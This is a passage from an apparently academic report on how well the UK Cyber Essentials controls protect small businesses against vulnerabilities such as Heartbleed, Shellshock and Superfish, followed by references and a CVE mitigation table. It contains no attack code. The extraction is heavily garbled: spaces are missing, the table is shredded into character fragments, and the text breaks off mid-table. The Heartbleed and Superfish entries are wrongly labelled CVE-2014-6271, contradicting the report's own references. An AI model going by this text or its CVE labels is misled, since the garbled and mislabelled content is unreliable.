The (1) TLS and (2) DTLSimplementations in OpenSSL 101before 101g do not properlyhandle Heartbeat Extension packetswhich allows remote attackers toobtain sensitive information fromprocess memory via crafted packetsthat trigger a buffer over-read asdemonstrated by reading privatekeys related to d1 bothc andt1 libc aka the Heartbleed bug
CVE-2014-6271[12]
As OpenSSL is a core part of manyapplications and services both in the openand closed source world this vulnerabilityhad the potential to damage a huge numberof systems At the time of release varioussources (including for example Netcraft[15])that up to 17 of trusted SSL-certified serverswere vulnerable to the attack
Depending on how the SME in questionoperates the threat this particular CVE posed(and indeed still poses with still as yetto be updated servers still online with thevulnerability) is difficult to discern Obviouslythe vulnerability is serious but the ability ofindividual SMEs to detect and correct this flawwill vary greatly depending on the individualdeployments
Larger companies with their ownLinuxUnix servers may have be able to deploythe patched OpenSSL version as soon as thepatch was available but smaller businesses
or those with more cloud-based services maynot have access to the software running onthe servers they use and may be at the mercyof the respective operators to implement thefix Because of this patch management onlypartially remedies this vulnerability and otherprotection methods from the Cyber Essentialsguidelines such as securing configurations orcontrolling access will have unknown effects
It is vulnerabilities such as this that posethe greatest threat to SME networks as themethods to fix the issue are often outside thecontrol of the company potentially leavingthem vulnerable far longer than one wouldexpect
ldquoSuperfishrdquo
The SDK for Komodia Redirectorwith SSL Digestor as usedin Lavasoft Ad-Aware WebCompanion 118851766 and Ad-Aware AdBlocker (alpha) 13691Qustodio for Windows AtomSecurity Inc StaffCop 58 andother products uses the sameX509 certificate private key fora root CA certificate across differentcustomersrsquo installations whichmakes it easier for man-in-the-middleattackers to spoof SSL servers byleveraging knowledge of this keyas originally reported for SuperfishVisualDiscovery on certain LenovoNotebook laptop products
CVE-2014-6271[14]
This vulnerability is particularly interestingas the software causing the issue waseffectively brokered by a trusted hardwarevendor namely Lenovo Because the issuewas part of the lsquonormal configurationrsquo forthe equipment it remained undetected fora long time and hints that there may befurther breaches in security as yet undiscoveredin both Lenovo and other manufacturerrsquosequipment
The vector is through the SuperFishsoftware essentially breaking the chain of trustfor SSL certificates by installing a self-signingcertificate in to the list of trusted certificateson the host machine This allows an attackerto simply sign their own code via the same
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 10 of 28
certificate which itself can be easily gatheredfrom any other machine running SuperFishand they have full access to any SSL-securedconnection from the target machine
Thankfully while the risks to users andSMEs was high the fix is a simple one-timerun of a removal tool provided by Lenovothemselves[11] and is mitigated fully throughthe Cyber Essentials patch managementadvice
Threat Analysis
ShellShock Without Cyber Essentials inplace SME 1 and 2 would be at risk fromlsquoShellshock as they both operate UnixLinuxbased systems that would require patching toplug the security issue The extent at whichSMEs 3 and 4 are vulnerable to this issue isunclear as their large dependency on outside
service providers leaves them in a positionwhere they are both unable to determine theirvulnerability and additionally unable to remedyit
With Cyber essentials SME 1 and 2 wouldbe fully protected and it is likely that SME3 and 4 are also protected if the externalproviders also use a Cyber Essentials or othersecurity and patching schemes
Heartbleed The lsquoHeartbleedrsquo bug is anothervulnerability that without Cyber Essentialsguidelines being followed would have laidcompanies external-facing services open tomalicious attackers
In all cases however each SME can befully protected with a combination of patchmanagement firewalling and application ofaccess controls from the Cyber Essentialsguidelines
SuperFish All of the SMEs we interviewedcould be exceedingly vulnerable to thelsquoSuperfishrsquo issue without Cyber Essentialsas much of their operations revolve aroundSSL encrypted communications A break inthe chain-of-trust for their certificates wouldallow an attacker to man-in-the-middle theircommunications
Normal system updates would have failedto remedy the situation as the fix providedby Lenovo consisted of a tool to be runin addition to the normal operating systempatches It is further debatable how effectiveCyber Essentials patch management wouldhave been in plugging this vulnerability as itwould require that the administrators be awareof the issue and know of the patch rather thansimply following lsquonormalrsquo patching guidelinesAssuming that the persons responsible for theequipment are aware of the issue howeverthen Cyber Essentials patch management fullymitigates this issue
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 11 of 28
ConclusionsT
he Cyber Essentials Security Tools havebeen shown to mitigate or to mitigateas soon as a patch is released all
vulnerabilities from remote attackers that donot exploit fundamentally insecure software orhardware Of the two-hundred vulnerabilitiescollected eight exploits were not able tobe resolved with the deployment of securitypatches for vulnerabilities such as these theonly mitigation available is simply not to installthe compromised systems To help preventdeployments being susceptible to attacks onfaulty systems it may be recommended that ablacklist of such items is composed for publicreference
Scope It is important to consider that thescope of this study covers only internet-basedcommodity-level attacks and although theCyber Essentials tools performs very well inmitigating this it does not represent fullsecurity There is an increasingly identifiedrisk from insiders that also requires attentionnot least malicious acts but also from usersunknowingly compromising security
The SMEs interviewed representorganisations from a range of market sectorsin web development and online presencespecialist scientific services the hospitalityindustry and finance
Additional Tools
The 10 Steps to Cyber Security[2] identifiesadditional security measures that supportthe Cyber Essentials Scheme well todeliver additional security through indirectmeasures such as User Education Awarenessalong with Network and Systems MonitoringThese additional measures would serve tobolster cyber security through fortifyingeach employee of the SME with necessaryknowledge on safe practice itrsquos importanceand some technical basic understanding -just as they may be versed in environmentalawareness Network and Systems Monitoringallows for remote user logins as well as fileaccess and activity to be logged For verysmall networks this may be currently infeasibleas the extra manpower or finances required for
such a system are costly However for largeorganisations additional monitoring capabilityshould be explored as a future extension tothe Cyber Essentials not just to identify andmitigate malicious action for more bespokeand sophisticated attacks than those reportedon but to also aid in providing evidence forany potential cyber-crime investigations
There exist some collective approaches toimproving cyber-security a notable example ofthis is The Cyber-security Information SharingPartnership (CiSP)[4] The partnership aimsto benefit all members by providing real-time updates on issues of cyber-securityand discovered vulnerabilities as well asbest-practice guides and other cyber-threatinformation It would be beneficial formore organisations to belong to cyber-securitycollectives like this creating networks ofinformed individuals working together to tacklecyber-crime This would be particularly usefulto quickly identify potential vulnerabilitiesand possible patches which as shown inthis report is critical for the CE patchmanagement security control to fully mitigaterelated vulnerabilities
An important note to be made is towardthe security of business affiliates and serviceproviders Even if an SME has CyberEssentials in place any use of cloud-servicesrelies on the vendorrsquos security controls forthreat mitigation In other words cloud-email accounting and any other cloud-basedor remote services are only as secure as theservice provider makes it In general cloud-providers should be holding a high level ofscrutiny to their security practice and shouldbe encouraged to certify their protectionHewlett-Packard(HP) has taken this furtherand has begun to strengthen itrsquos entire supply-chain ( 600 SMEs) with the Cyber Essentialsaccreditation This provides protection acrossthe entirety of Hewlett Packardrsquos operationsas well as itrsquos affiliates This should be agoal for organisations of all sizes minimisingthe risk from cyber-threats by ensuring alltrading partners uphold the same high levelsof security
Cyber Essentials Controls
Of the five current Cyber Essentials ControlsPatch Management was considered to aid inthe mitigation of the highest proportion ofremote attacks (875 ) counter-intuitivelythe Survey responses had patch managementranked last in use for SMEs The highestcurrently used controls could be seen asthose providing the most intuitive or easilyunderstood protection Data loss preventionstrong passwords and firewall While patchmanagement isnrsquot necessarily understood byindividuals as a tool to greatly improve cyber-security
Anti-Malware was useful in mitigating theleast (10 ) vulnerabilities It is howeverimportant to note that Anti-Malware is largelythe only security tool that may routinely scanthe network hardware and software as wellas any items downloaded from the internetor as email attachments This serves as alast line of defence and as such is vital to anorganisationrsquos cyber-safety
Recommendations
To further improve cyber-security across theUK we recommend that
1 Collective approaches to cyber securityshould be further encouraged Inparticular a governmentalcollectiveapproach to identifying inherently flawedproducts should be developed Thiscould be in addition to or as an extensionto current initiatives like CiSP whichcan make a difference in detecting andreacting on potential vulnerabilities in atimely manner
2 Further research into the mitigation ofother cyber-threats is carried out toexplore the risk from insider-threats andtargeted attacks
3 Further employee education is stronglyencouraged specially to be able totackle these other types of attacksmentioned above which were not underthe scope of this report
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 12 of 28
References[1] Centre for the Protection of
National Infrastructure CESGCabinet Office InnovationDepartment for Business andSkills Cyber security guidance forbusiness httpswwwgovuk
governmentpublicationscyber-
risk-management-a-board-level-
responsibility September 2012
[2] Centre for the Protection ofNational Infrastructure CESGCabinet Office and Innovation amp SkillsDepartment for Business 10 stepsto cyber security httpswwwgov
ukgovernmentpublicationscyber-
risk-management-a-board-level-
responsibility September 2012
[3] Innovation CESG UK Trade ampInvestment Prime Ministerrsquos Office10 Downing Street Centre for theProtection of National InfrastructureGovernment CommunicationsHeadquaters UK Trade amp Departmentfor Business and Skills Cyber securityboost for uk firms httpswww
govukgovernmentnewscyber-
security-boost-for-uk-firmsJanuary 2015
[4] Centre for the Protection ofNational Infrastructure CiSPCERT-UK and Innovation amp SkillsDepartment for Business Cyber-securityinformation sharing partnership (cisp)httpswwwcertgovukcispMarch 2013
[5] CREST Cyber essentialscertified companies http
wwwcyberessentialsorglistMarch 2015
[6] CVEMitreorg Terminology - mitreorghttpcvemitreorgabout
terminologyhtml
[7] Cyber Essentials Cyber essentialsscheme - overview httpswwwgov
ukgovernmentpublicationscyber-
essentials-scheme-overview
[8] CESG Cabinet Office Centre for theProtection of National InfrastructureDepartment for Business Innovationamp Skills Common cyber attacksReducing the impact https
wwwgovukgovernmentuploads
systemuploadsattachment_data
file400106Common_Cyber_Attacks-
Reducing_The_Impactpdf January2015
[9] UK Cyber Security Forum Northwest cyber security clusterhttpwwwukcybersecurityforum
comindexphpcyber-security-
clustersnorth-west-lsquo-cluster2015
[10] HM Government Cyber essentialscertified companies https
wwwgovukgovernmentuploads
systemuploadsattachment_data
file400914bis-15-72-cyber-
essentials-scheme-assurance-
frameworkpdf January 2015
[11] Lenovo Superfish uninstall instructionshttpsupportlenovocomus
enproduct_securitysuperfish_
uninstall
[12] Mitreorg Cve-2014-0160 akaheartbleed httpcvemitreorg
cgi-bincvenamecginame=CVE-
2014-0160 2014
[13] Mitreorg Cve-2014-6271 akashellshock httpcvemitreorg
cgi-bincvenamecginame=CVE-
2014-6271 2014
[14] Mitreorg Cve-2015-2077 aka superfishhttpcvemitreorgcgi-bin
cvenamecginame=CVE-2015-20772015
[15] Netcraft Half a million widely trustedwebsites vulnerable to heartbleedbug httpnewsnetcraftcom
archives20140408half-a-
million-widely-trusted-websites-
vulnerable-to-heartbleed-
bughtml April 2014
[16] Cabinet Office The uk cyber securitystrategy - protecting and promotingthe uk in a digital world https
wwwgovukgovernmentuploads
systemuploadsattachment_data
file60961uk-cyber-security-
strategy-finalpdf November 2011
[17] Cabinet Office and The Rt HonFrancis Maude MP Governmentmandates new cyber security standardfor suppliers httpswwwgov
ukgovernmentnewsgovernment-
mandates-new-cyber-security-
standard-for-suppliers September2014
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 13 of 28
Cyb
erC
ontr
ols
App
licab
ility
CV
ES
ME
1S
ME
2S
ME
3S
ME
4Id
ealis
edN
oC
EW
ith
CE
CV
E-2
01
3-0
00
8y
yy
yy
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lS
ecu
reC
on
fig
ura
tio
n(U
ser
Po
licy)
A
nti
-Mal
war
eC
VE
-20
13
-00
22
yn
yy
nN
ot
Mit
igat
edM
itig
ated
-P
atch
Man
agem
ent
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Web
site
Bla
cklis
tin
gC
VE
-20
13
-00
84
yy
yn
yN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Pat
chM
anag
emen
tS
ecu
reC
on
fig
ura
tio
n(S
ecu
reB
row
ser)
W
ebsi
teB
lack
listi
ng
CV
E-2
01
3-0
14
0y
nn
nn
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
CV
E-2
01
3-0
14
9n
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lS
ecu
reC
on
fig
ura
tio
n
Pat
chM
anag
emen
tC
VE
-20
13
-01
72
yn
nn
nN
ot
Mit
igat
edM
itig
ated
-U
ser
Acc
ess
(Str
on
gP
assw
ord
)P
atch
Man
agem
ent
CV
E-2
01
3-0
17
4n
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Acc
ess
Po
licy
(Str
on
gP
assw
ord
)F
irew
all
Pat
chM
anag
emen
tC
VE
-20
13
-01
99
yn
nn
nN
ot
Mit
igat
edM
itig
ated
-P
atch
Man
agem
ent
ampS
ecu
reC
on
fig
ura
tio
nC
VE
-20
13
-02
53
nn
yn
nN
ot
Mit
igat
edM
itig
ated
-P
atch
Man
agem
ent
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Ser
ver)
CV
E-2
01
3-0
27
0n
nn
nn
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
CV
E-2
01
3-0
48
1n
nn
nn
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
CV
E-2
01
3-0
59
8n
nn
nn
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
CV
E-2
01
3-0
61
9y
yy
yy
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
CV
E-2
01
3-0
63
3y
yy
yy
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lS
ecu
reC
on
fig
ura
tio
n(S
ecu
reB
row
sin
g)
Fir
mw
are
Man
agem
ent
CV
E-2
01
3-0
64
9y
yy
yy
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lS
ecu
reC
on
fig
ura
tio
n(S
ecu
reB
row
sin
g)
Pat
chM
anag
emen
tC
VE
-20
13
-07
46
yy
yy
yN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Pat
chM
anag
emen
tC
VE
-20
13
-07
53
yy
yy
yN
ot
Mit
igat
edM
itig
ated
-P
atch
Man
agem
ent
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Web
site
Bla
cklis
tin
gC
VE
-20
13
-07
87
yy
yy
nN
ot
Mit
igat
edM
itig
ated
-P
atch
Man
agem
ent
CV
E-2
01
3-0
90
9y
yy
yy
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
CV
E-2
01
3-1
03
5y
yy
yn
No
tM
itig
ated
Mit
igat
ed-
Pat
chM
anag
emen
tS
ecu
reC
on
fig
ura
tio
n(S
ecu
reB
row
ser)
W
ebsi
teB
lack
listi
ng
CV
E-2
01
3-1
10
2n
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lS
ecu
reC
on
fig
ura
tio
n
Pat
chM
anag
emen
tC
VE
-20
13
-11
40
nn
nn
nN
ot
Mit
igat
edN
ot
Mit
igat
ed-
Sec
ure
Co
nfi
gu
rati
on
(Do
nrsquot
inst
all)
CV
E-2
01
3-1
14
4n
nn
nn
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
ampF
irew
all
CV
E-2
01
3-1
15
3y
nn
nn
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
Sec
ure
Co
nfi
gu
rati
on
CV
E-2
01
3-1
18
1n
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lS
ecu
reC
on
fig
ura
tio
n
Pat
chM
anag
emen
tC
VE
-20
13
-13
03
yn
yy
nN
ot
Mit
igat
edM
itig
ated
-P
atch
Man
agem
ent
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Web
site
Bla
cklis
tin
gC
VE
-20
13
-13
84
yy
yy
nN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Pat
chM
anag
emen
tS
ecu
reC
on
fig
ura
tio
n(S
ecu
reB
row
ser)
CV
E-2
01
3-1
38
8n
nn
nn
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
Sec
ure
Co
nfi
gu
rati
on
CV
E-2
01
3-1
45
0y
ny
yn
No
tM
itig
ated
Mit
igat
ed-
Sec
ure
Co
nfi
gu
rati
on
P
atch
Man
agem
ent
CV
E-2
01
3-1
47
2y
yy
yn
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
Sec
ure
Co
nfi
gu
rati
on
(Acc
ess
Po
licy)
CV
E-2
01
3-1
55
3y
ny
yn
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
CV
E-2
01
3-1
62
0y
yy
yn
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
ampF
irew
all
CV
E-2
01
3-1
62
7n
nn
nn
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
CV
E-2
01
3-1
63
8y
yy
yn
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
CV
E-2
01
3-1
66
9y
yy
yy
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
CV
E-2
01
3-1
67
6y
yy
yy
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
CV
E-2
01
3-1
70
0y
yy
yy
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lS
ecu
reC
on
fig
ura
tio
n
Pat
chM
anag
emen
tA
nti
-Mal
war
eC
VE
-20
13
-17
34
nn
nn
nN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Pat
chM
anag
emen
tC
VE
-20
13
-17
77
nn
yn
nN
ot
Mit
igat
edM
itig
ated
-F
irew
all
Pat
chM
anag
emen
tC
VE
-20
13
-23
19
nn
nn
nN
ot
Mit
igat
edM
itig
ated
-P
atch
Man
agem
ent
Fir
ewal
lS
ecu
reC
on
fig
ura
tio
n(S
ecu
reB
row
ser)
C
VE
-20
13
-23
40
nn
nn
nN
ot
Mit
igat
edN
ot
Mit
igat
ed-
Sec
ure
Co
nfi
gu
rati
on
(Do
nrsquot
inst
all)
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 14 of 28
CV
ES
ME
1S
ME
2S
ME
3S
ME
4Id
ealis
edN
oC
EW
ith
CE
CV
E-2
01
3-2
35
0n
yn
ny
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
ampF
irew
all
CV
E-2
01
3-2
49
2y
ny
nn
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lS
ecu
reC
on
fig
ura
tio
n
Pat
chM
anag
emen
tC
VE
-20
13
-25
07
yn
nn
nN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Fir
mw
are
Man
agem
ent
An
ti-M
alw
are
CV
E-2
01
3-2
73
6y
yy
yy
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
CV
E-2
01
3-2
78
0n
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lS
ecu
reC
on
fig
ura
tio
n
Pat
chM
anag
emen
tC
VE
-20
13
-28
03
nn
nn
nN
ot
Mit
igat
edM
itig
ated
-S
tro
ng
Pas
swor
ds
Pat
chM
anag
emen
tsC
VE
-20
13
-28
24
nn
nn
nN
ot
Mit
igat
edM
itig
ated
-F
irew
all
Sec
ure
Co
nfi
gu
rati
on
P
atch
Man
agem
ent
CV
E-2
01
3-2
82
6n
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lS
ecu
reC
on
fig
ura
tio
n
Pat
chM
anag
emen
tC
VE
-20
13
-29
20
ny
yy
yN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Pat
chM
anag
emen
tC
VE
-20
13
-30
64
yn
nn
nN
ot
Mit
igat
edM
itig
ated
-P
atch
Man
agem
ent
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Web
site
Bla
cklis
tin
gC
VE
-20
13
-31
16
yn
yy
nN
ot
Mit
igat
edM
itig
ated
-P
atch
Man
agem
ent
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Web
site
Bla
cklis
tin
gC
VE
-20
13
-31
37
yy
yy
nN
ot
Mit
igat
edM
itig
ated
-A
nti
-Mal
war
eS
ecu
reC
on
fig
ura
tio
n(D
on
rsquotIn
stal
l)C
VE
-20
13
-31
94
yn
yy
nN
ot
Mit
igat
edM
itig
ated
-P
atch
Man
agem
ent
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Web
site
Bla
cklis
tin
gC
VE
-20
13
-31
99
yn
yy
yN
ot
Mit
igat
edM
itig
ated
-P
atch
Man
agem
ent
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Web
site
Bla
cklis
tin
gC
VE
-20
13
-32
01
yn
yy
yN
ot
Mit
igat
edM
itig
ated
-P
atch
Man
agem
ent
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Web
site
Bla
cklis
tin
gC
VE
-20
13
-32
06
yn
yy
nN
ot
Mit
igat
edM
itig
ated
-P
atch
Man
agem
ent
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Web
site
Bla
cklis
tin
gC
VE
-20
13
-32
80
nn
nn
nN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Pat
chM
anag
emen
tamp
Sec
ure
Co
nfi
gu
rati
on
CV
E-2
01
3-3
38
7n
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lS
ecu
reC
on
fig
ura
tio
n
Pat
chM
anag
emen
tC
VE
-20
13
-34
17
nn
nn
nN
ot
Mit
igat
edM
itig
ated
-S
ecu
reC
on
fig
ura
tio
n(S
ecu
reB
row
ser)
W
ebsi
teB
lack
listi
ng
CV
E-2
01
3-3
63
2y
yy
nn
No
tM
itig
ated
Mit
igat
ed-
Acc
ess
Po
licy
(Str
on
gP
assw
ord
)F
irew
all
CV
E-2
01
3-3
65
6n
nn
nn
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
CV
E-2
01
3-3
85
6y
yy
yy
No
tM
itig
ated
Mit
igat
ed-
Pat
chM
anag
emen
tF
irew
all
An
ti-M
alw
are
CV
E-2
01
3-3
86
0y
yy
yy
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
CV
E-2
01
3-3
89
3y
ny
yn
No
tM
itig
ated
Mit
igat
ed-
Pat
chM
anag
emen
tS
ecu
reC
on
fig
ura
tio
n-
no
JS
CV
E-2
01
3-3
89
7y
ny
yn
No
tM
itig
ated
Mit
igat
ed-
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Web
site
Bla
cklis
tin
gC
VE
-20
13
-39
00
yy
yy
yN
ot
Mit
igat
edM
itig
ated
-F
irew
all
Sec
ure
Co
nfi
gu
rati
on
P
atch
Man
agem
ent
CV
E-2
01
3-3
90
5y
yn
yn
No
tM
itig
ated
No
tM
itig
ated
-S
ecu
reC
on
fig
ura
tio
n(D
on
rsquotin
stal
l)C
VE
-20
13
-42
23
yn
nn
nN
ot
Mit
igat
edN
ot
Mit
igat
ed-
Sec
ure
Co
nfi
gu
rati
on
(Do
nrsquot
inst
all)
CV
E-2
01
3-4
43
6n
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Sec
ure
Co
nfi
gu
rati
on
P
atch
Man
agem
ent
CV
E-2
01
3-4
47
8n
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Pat
chM
anag
emen
tS
ecu
reC
on
fig
ura
tio
nC
VE
-20
13
-45
29
nn
nn
nN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Pat
chM
anag
emen
tC
VE
-20
13
-45
55
yn
yy
nN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Pat
chM
anag
emen
tC
VE
-20
13
-47
76
yn
nn
nN
ot
Mit
igat
edM
itig
ated
-F
irew
all
Sec
ure
Co
nfi
gu
rati
on
P
atch
Man
agem
ent
CV
E-2
01
3-4
78
2n
nn
nn
No
tM
itig
ated
No
tM
itig
ated
-S
ecu
reC
on
fig
ura
tio
n(D
on
rsquotin
stal
l)C
VE
-20
13
-50
57
yy
yy
yN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Pat
chM
anag
emen
tS
ecu
reC
on
fig
ura
tio
n(S
ecu
reB
row
ser)
W
ebsi
teB
lack
listi
ng
CV
E-2
01
3-5
36
9n
nn
nn
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
ampS
ecu
reC
on
fig
ura
tio
nC
VE
-20
13
-54
28
nn
nn
nN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Pat
chM
anag
emen
tC
VE
-20
13
-54
31
nn
nn
nN
ot
Mit
igat
edM
itig
ated
-P
atch
Man
agem
ent
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Web
site
Bla
cklis
tin
gC
VE
-20
13
-54
94
nn
nn
nN
ot
Mit
igat
edN
ot
Mit
igat
ed-
Sec
ure
Co
nfi
gu
rati
on
CV
E-2
01
3-5
50
7n
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lP
atch
Man
agem
ent
CV
E-2
01
3-5
53
6n
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lP
atch
Man
agem
ent
CV
E-2
01
3-5
55
9n
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Pat
chM
anag
emen
tS
ecu
reC
on
fig
ura
tio
n(S
ecu
reB
row
ser)
W
ebsi
teB
lack
listi
ng
CV
E-2
01
3-5
56
1n
nn
nn
No
tM
itig
ated
No
tM
itig
ated
-S
ecu
reC
on
fig
ura
tio
nC
VE
-20
13
-57
51
nn
nn
nN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Pat
chM
anag
emen
tamp
Sec
ure
Co
nfi
gu
rati
on
CV
E-2
01
3-5
75
7n
nn
nm
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lC
VE
-20
13
-58
28
nn
nn
nN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Pat
chM
anag
emen
t
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 15 of 28
CV
ES
ME
1S
ME
2S
ME
3S
ME
4Id
ealis
edN
oC
EW
ith
CE
CV
E-2
01
3-6
16
7y
yy
yy
No
tM
itig
ated
Mit
igat
ed-
Pat
chM
anag
emen
tA
cces
sC
on
tro
lS
ecu
reC
on
fig
ura
tio
n(C
oo
kie-
del
etio
n)
CV
E-2
01
3-6
18
8y
yn
nn
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Web
site
Bla
cklis
tin
gC
VE
-20
13
-62
84
nn
nn
nN
ot
Mit
igat
edN
ot
Mit
igat
ed-
Sec
ure
Co
nfi
gu
rati
on
(Do
nrsquot
inst
all)
CV
E-2
01
3-6
39
6n
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Pat
chM
anag
emen
tS
ecu
reC
on
fig
ura
tio
n(S
ecu
reS
erve
r)C
VE
-20
13
-64
75
ny
yn
nN
ot
Mit
igat
edM
itig
ated
-A
nti
-Mal
war
eF
irew
all
Pat
chM
anag
emen
tC
VE
-20
13
-66
60
yy
yy
yN
ot
Mit
igat
edM
itig
ated
-P
atch
Man
agem
ent
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Web
site
Bla
cklis
tin
gC
VE
-20
13
-66
99
nn
nn
nN
ot
Mit
igat
edM
itig
ated
-F
irew
all
Sec
ure
Co
nfi
gu
rati
on
CV
E-2
01
3-6
70
2n
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lP
atch
Man
agem
ent
CV
E-2
01
3-6
97
9n
nn
nn
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
CV
E-2
01
3-6
99
4n
ny
nn
No
tM
itig
ated
Mit
igat
ed-
Sec
ure
Co
nfi
gu
rati
on
P
atch
Man
agem
ent
CV
E-2
01
3-7
00
4y
nn
yn
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lS
ecu
reC
on
fig
ura
tio
n
Fir
mw
are
Man
agem
ent
CV
E-2
01
3-7
04
3n
nn
yn
No
tM
itig
ated
Par
tial
lyM
itig
ated
-F
irm
war
eM
anag
emen
tC
VE
-20
13
-73
89
yn
ny
yN
ot
Mit
igat
edM
itig
ated
-F
irew
all
Sec
ure
Co
nfi
gu
rati
on
F
irm
war
eM
anag
emen
tC
VE
-20
14
-00
01
yn
yn
nN
ot
Mit
igat
edM
itig
ated
-B
ou
nd
ary
Fir
ewal
lsin
clu
de
anti
-DO
SC
VE
-20
14
-00
35
nn
yn
nN
ot
Mit
igat
edM
itig
ated
-P
atch
Man
agem
ent
ampS
SL
CV
E-2
01
4-0
16
0y
yy
yy
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
CV
E-2
01
4-0
20
7n
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Pat
chM
anag
emen
tamp
SS
LC
VE
-20
14
-02
32
yy
yn
nN
ot
Mit
igat
edM
itig
ated
-S
ecu
reC
on
fig
ura
tio
n
Pat
chM
anag
emen
tC
VE
-20
14
-02
59
yy
yy
yN
ot
Mit
igat
edM
itig
ated
-M
alw
are
Pro
tect
ion
ampP
atch
Man
agem
ent
CV
E-2
01
4-0
26
6y
yy
ny
No
tM
itig
ated
Par
tial
lyM
itig
ated
-S
ecu
reC
on
fig
ura
tio
n(S
ecu
reB
row
ser)
W
ebsi
teB
lack
listi
ng
CV
E-2
01
4-0
29
4n
ny
ny
No
tM
itig
ated
Mit
igat
ed-
Sec
ure
Co
nfi
gu
rati
on
A
nti
-Mal
war
eC
VE
-20
14
-03
13
yn
yy
nN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Web
site
Bla
cklis
tin
gC
VE
-20
14
-03
54
yn
ny
nN
ot
Mit
igat
edM
itig
ated
-S
ecu
reC
on
fig
ura
tio
n
Fir
mw
